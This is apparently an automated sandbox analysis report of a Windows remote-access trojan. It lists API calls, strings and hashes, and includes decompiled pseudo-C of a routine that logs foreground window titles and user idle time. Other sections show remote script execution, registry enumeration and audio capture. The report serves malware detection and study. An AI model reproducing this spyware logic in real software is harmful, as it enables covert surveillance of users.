                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@D@2@@0@V?$basic_string@$Hstd@@$V10@0@$V01@$??4?$basic_string@$V10@@$??0?$basic_string@V01@@V10@$??8std@@CloseD@1@@EnumInfoOpenQueryY?$basic_string@
                                          • String ID: regmsg$regopened
                                          • API String ID: 661915744-492665732
                                          • Opcode ID: 0ef7c05162cb41bc684b5b56ec50b8bb07652c3a5618f8f553b611841891aa8a
                                          • Instruction ID: 760c7205af8a56aa8fc39ec9197364d881e5bd0ec4cdde1e626b63b7fd3aa999
                                          • Opcode Fuzzy Hash: 0ef7c05162cb41bc684b5b56ec50b8bb07652c3a5618f8f553b611841891aa8a
                                          • Instruction Fuzzy Hash: 875153B1900109ABDB04FBA0ED4FDDE776CEB55304F104176FA06B2191EE7C5E988B69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004108CC,?,?,?,?), ref: 0040D228
                                          • getenv.MSVCRT ref: 0040D234
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?), ref: 0040D240
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040D24D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D258
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D261
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040D26E
                                          • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040D27B
                                          • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040D287
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 0040D2A0
                                          • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040D2AD
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D2CC
                                          • ShellExecuteExA.SHELL32(0000003C), ref: 0040D2E9
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040D31F
                                          • CloseHandle.KERNEL32(?), ref: 0040D328
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D331
                                          • DeleteFileA.KERNEL32(00000000), ref: 0040D338
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(remscriptexecd,?), ref: 0040D30D
                                            • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                            • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(remscriptsuccess,?,?,?,?,?), ref: 0040D352
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(remscripterr,?), ref: 0040D36A
                                          • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?), ref: 0040D380
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040D389
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040D392
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040D39B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@std@@@std@@$?c_str@?$basic_string@V?$basic_string@$D@2@@0@Hstd@@$??0?$basic_ofstream@??6std@@?close@?$basic_ofstream@?is_open@?$basic_ofstream@CloseD?$basic_ofstream@D@2@@0@@D@std@@@0@DeleteExecuteFileHandleObjectShellSingleV01@@V10@V10@0@V10@@V?$basic_ostream@Waitgetenv
                                          • String ID: <$@$Temp$remscripterr$remscriptexecd$remscriptsuccess
                                          • API String ID: 2271834883-3956447440
                                          • Opcode ID: ad663a8d2a633417fe1706364678858063ddc7b1f600590b5d4ecc61305022c1
                                          • Instruction ID: 40b226df9838ff9ebd93e372db10a445ae0d15efabd19c6d5a2c8874623cc937
                                          • Opcode Fuzzy Hash: ad663a8d2a633417fe1706364678858063ddc7b1f600590b5d4ecc61305022c1
                                          • Instruction Fuzzy Hash: 1F41307190011EEBDB14EFA0DD4DAEE7B78FF44305F10417AF502A21A0DBB85A89CB59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E00404077(intOrPtr __ecx) {
                                          				char _v5;
                                          				char _v6;
                                          				char _v7;
                                          				intOrPtr _v12;
                                          				signed int _v16;
                                          				char _v28;
                                          				char _v44;
                                          				char _v60;
                                          				char _v76;
                                          				void* _v92;
                                          				intOrPtr _t39;
                                          				int _t41;
                                          				CHAR* _t43;
                                          				signed int _t46;
                                          				char* _t56;
                                          				char* _t57;
                                          				struct HWND__* _t87;
                                          				intOrPtr _t88;
                                          				void* _t93;
                                          
                                          				_v12 = __ecx;
                                          				while(1) {
                                          					_t39 = _v12;
                                          					if( *((char*)(_t39 + 0x38)) == 0 &&  *((char*)(_t39 + 0x39)) == 0) {
                                          						break;
                                          					}
                                          					if(( *0x415740 & 0x00000001) == 0) {
                                          						 *0x415740 =  *0x415740 | 0x00000001;
                                          						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                          						E0040FCBA(E00404254);
                                          					}
                                          					Sleep(0x1f4);
                                          					_t87 = GetForegroundWindow();
                                          					_t41 = GetWindowTextLengthA(_t87);
                                          					_t89 = _t41;
                                          					_t9 = _t89 + 1; // 0x1
                                          					_t43 = _t9;
                                          					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z(_t43, 0,  &_v6);
                                          					if(_t41 == 0) {
                                          						L8:
                                          						_t88 = _v12;
                                          					} else {
                                          						__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          						GetWindowTextA(_t87, _t43, _t43);
                                          						_t56 =  &_v44;
                                          						__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z(_t56, 0x415748);
                                          						if(_t56 != 0) {
                                          							goto L8;
                                          						} else {
                                          							_t57 =  &_v44;
                                          							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t57);
                                          							__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          							__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z(_t57 - 1);
                                          							_t97 = _t93 - 0x10;
                                          							L0040FC1A();
                                          							L0040FC20();
                                          							_t88 = _v12;
                                          							_t93 = _t93 - 0x10 + 0x18;
                                          							E00403A9A(_t88, _t97,  &_v60,  &_v60, "\r\n[ ",  &_v44);
                                          							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(" ]\r\n", 0);
                                          						}
                                          					}
                                          					_t67 = _t88;
                                          					E00405142(_t88);
                                          					if(E0040E898(_t88) < 0xea60) {
                                          						L15:
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          						continue;
                                          					} else {
                                          						while( *((char*)(_t88 + 0x38)) != 0 ||  *((char*)(_t88 + 0x39)) != 0) {
                                          							_t46 = E0040E898(_t67);
                                          							if(_t46 < 0xea60) {
                                          								__imp___itoa(_v16 / 0xea60,  &_v28, 0xa);
                                          								_t95 = _t93 + 0xc - 0x10;
                                          								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v28,  &_v7, " minutes }\r\n", 0);
                                          								L0040FC1A();
                                          								L0040FC20();
                                          								_t93 = _t93 + 0xc - 0x10 + 0x18;
                                          								E00403A9A(_t88, _t95,  &_v76,  &_v76, "\r\n{ User has been idle for ",  &_v28);
                                          								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          								goto L15;
                                          							} else {
                                          								_v16 = _t46;
                                          								Sleep(0x3e8);
                                          								continue;
                                          							}
                                          							goto L17;
                                          						}
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					}
                                          					break;
                                          				}
                                          				L17:
                                          				return 0;
                                          			}






















                                          0x00404086
                                          0x00404089
                                          0x00404089
                                          0x00404090
                                          0x00000000
                                          0x00000000
                                          0x004040a3
                                          0x004040a5
                                          0x004040b5
                                          0x004040c0
                                          0x004040c5
                                          0x004040cb
                                          0x004040d3
                                          0x004040d6
                                          0x004040dc
                                          0x004040e4
                                          0x004040e4
                                          0x004040eb
                                          0x004040f3
                                          0x0040418c
                                          0x0040418c
                                          0x004040f9
                                          0x004040fc
                                          0x00404106
                                          0x0040410e
                                          0x00404114
                                          0x0040411d
                                          0x00404127
                                          0x00000000
                                          0x00404129
                                          0x00404129
                                          0x00404132
                                          0x0040413b
                                          0x00404146
                                          0x00404151
                                          0x00404165
                                          0x0040416f
                                          0x00404174
                                          0x00404177
                                          0x0040417c
                                          0x00404184
                                          0x00404184
                                          0x00404127
                                          0x0040418f
                                          0x00404191
                                          0x004041a2
                                          0x00404236
                                          0x00404239
                                          0x00000000
                                          0x004041a8
                                          0x004041a8
                                          0x004041b8
                                          0x004041bf
                                          0x004041db
                                          0x004041ec
                                          0x004041fb
                                          0x0040420b
                                          0x00404215
                                          0x0040421a
                                          0x0040421f
                                          0x00404227
                                          0x00404230
                                          0x00000000
                                          0x004041c1
                                          0x004041c6
                                          0x004041c9
                                          0x00000000
                                          0x004041c9
                                          0x00000000
                                          0x004041bf
                                          0x00404247
                                          0x00404247
                                          0x00000000
                                          0x004041a2
                                          0x0040424f
                                          0x00404253

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004040B5
                                          • Sleep.KERNEL32(000001F4), ref: 004040CB
                                          • GetForegroundWindow.USER32 ref: 004040CD
                                          • GetWindowTextLengthA.USER32(00000000), ref: 004040D6
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?), ref: 004040EB
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004040FC
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404106
                                          • GetWindowTextA.USER32 ref: 0040410E
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,00415748), ref: 0040411D
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00404132
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040413B
                                          • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(-00000001), ref: 00404146
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(00000000,[ ,?, ]), ref: 00404165
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?, ]), ref: 0040416F
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ]), ref: 00404184
                                          • Sleep.KERNEL32(000003E8,?,?,?,?,?, ]), ref: 004041C9
                                          • _itoa.MSVCRT ref: 004041DB
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?, minutes },?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 004041FB
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,{ User has been idle for ,00000000,?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 0040420B
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00404215
                                            • Part of subcall function 00403A9A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,74B06490,?,00405E64), ref: 00403AAD
                                            • Part of subcall function 00403A9A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,74B06490,?,00405E64), ref: 00403AC0
                                            • Part of subcall function 00403A9A: SetEvent.KERNEL32(00000000,?,00405E64), ref: 00403AC9
                                            • Part of subcall function 00403A9A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(74B06490,?,00405E64), ref: 00403AD8
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404227
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404230
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404239
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ]), ref: 00404247
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$D@2@@0@Hstd@@$??0?$basic_string@D@1@@V01@V01@@Window$?length@?$basic_string@SleepTextV10@V10@@Y?$basic_string@$??4?$basic_string@??8std@@?c_str@?$basic_string@?resize@?$basic_string@D@2@@0@0@EventForegroundLength_itoa
                                          • String ID: [ ${ User has been idle for $ ]$ minutes }
                                          • API String ID: 2152833798-3343415809
                                          • Opcode ID: 16de867c107b42ae11ad0244138e34ded14529554952528baadd8620eb8bfb8a
                                          • Instruction ID: 87bb5fb799bf3fa09b99bd2927ef5b1b1dfbc4c52e589369c19be6cb3ab50cf0
                                          • Opcode Fuzzy Hash: 16de867c107b42ae11ad0244138e34ded14529554952528baadd8620eb8bfb8a
                                          • Instruction Fuzzy Hash: 33517571900109AFDB10ABE0DC8DAEE7B78EB95314F04447AF601B31D1DB7899C5CB59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegQueryInfoKeyA.ADVAPI32(004095BF,?,00000000,00000000,004095BF,?,?), ref: 004092D6
                                          • RegEnumKeyExA.ADVAPI32(004095BF,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00409305
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410EC8,?), ref: 0040931B
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,00000000), ref: 0040932D
                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,004095BF,00409BF5), ref: 0040933B
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,004095BF,00409BF5), ref: 00409344
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,004095BF,00409BF5), ref: 0040934D
                                          • RegEnumValueA.ADVAPI32(004095BF,?,?,00003FFF,00000000,?,?,00002710), ref: 004093AD
                                          • _itoa.MSVCRT ref: 004093C4
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410EC8,?,?,004095BF,00409BF5), ref: 004093DD
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,00000000,?,004095BF,00409BF5), ref: 004093EF
                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,004095BF,00409BF5), ref: 004093FD
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,004095BF,00409BF5), ref: 00409406
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,004095BF,00409BF5), ref: 00409412
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410EC8,?,?,?,?,?,004095BF,00409BF5), ref: 00409423
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,00000000,?,?,?,?,004095BF,00409BF5), ref: 00409432
                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,004095BF,00409BF5), ref: 00409440
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,004095BF,00409BF5), ref: 00409449
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,004095BF,00409BF5), ref: 00409455
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([regsplt],?,?,?,?,?,?,?,?,004095BF,00409BF5), ref: 0040946A
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,004095BF,00409BF5), ref: 00409485
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,004095BF,00409BF5), ref: 00409493
                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,004095BF,00409BF5), ref: 004094A1
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,004095BF,00409BF5), ref: 004094AD
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,004095BF,00409BF5), ref: 004094B9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,004095BF,00409BF5), ref: 004094C5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@1@@$D@2@@0@Hstd@@V01@V01@@V?$basic_string@Y?$basic_string@$V10@@$Enum$InfoQueryV10@0@Value_itoa
                                          • String ID: [regsplt]
                                          • API String ID: 1517376382-4262303796
                                          • Opcode ID: 30431976b1ae715cd0fc3e13eb5c78d9e9581a0f57f9494c5079139dd48f7a99
                                          • Instruction ID: f30101ecd5197dc84c436124cfbb1774ebe9f78b1b9e58743e63aaff6b42f93f
                                          • Opcode Fuzzy Hash: 30431976b1ae715cd0fc3e13eb5c78d9e9581a0f57f9494c5079139dd48f7a99
                                          • Instruction Fuzzy Hash: 0471E97290011EAFDB11DBA0DD89DEEB77CFB48304F0041B6E606E2151DB749E898F64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00401539
                                          • closesocket.WS2_32 ref: 00401564
                                          • ExitThread.KERNEL32 ref: 00401572
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000020,?,00415268,00000000), ref: 0040159E
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004151D8,00000012,?,00415268,00000000), ref: 004015B4
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,playaudio,00415268,00000000), ref: 004015C5
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000), ref: 004015D2
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00000000), ref: 004015DF
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00000000), ref: 004015EC
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004015F9
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401609
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00401615
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401621
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040162A
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401633
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040163C
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401645
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040164E
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401657
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401663
                                          • waveInUnprepareHeader.WINMM(-0041519C,00000020), ref: 00401680
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004016A5
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004016EB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@$D@1@@$V01@@$??4?$basic_string@ExitHeaderThreadUnprepareV01@V10@@closesocketwave
                                          • String ID: playaudio
                                          • API String ID: 2056009259-1314764895
                                          • Opcode ID: 3742e07a2a259b882a403f627092aaa57361fb2f085af106636733a191568580
                                          • Instruction ID: 76c54256c40fbbf35d32c407d69db5079ebfec01750c77bb5de673180f13f9b1
                                          • Opcode Fuzzy Hash: 3742e07a2a259b882a403f627092aaa57361fb2f085af106636733a191568580
                                          • Instruction Fuzzy Hash: 2F416F72900109ABDB01EBA0ED4EADE777CFB55305F104176F506E21A1EE785E48CB68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,00415A30,00000000), ref: 004022FC
                                          • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415258,00410668), ref: 00402314
                                          • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402323
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040232D
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 00402346
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040234F
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040235D
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415A60), ref: 0040236E
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040238E
                                          • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415258,00410668), ref: 004023A6
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004023B8
                                          • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,73115DF0), ref: 004023CE
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004023D8
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004023E1
                                          • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,?), ref: 004023F2
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004023FC
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402405
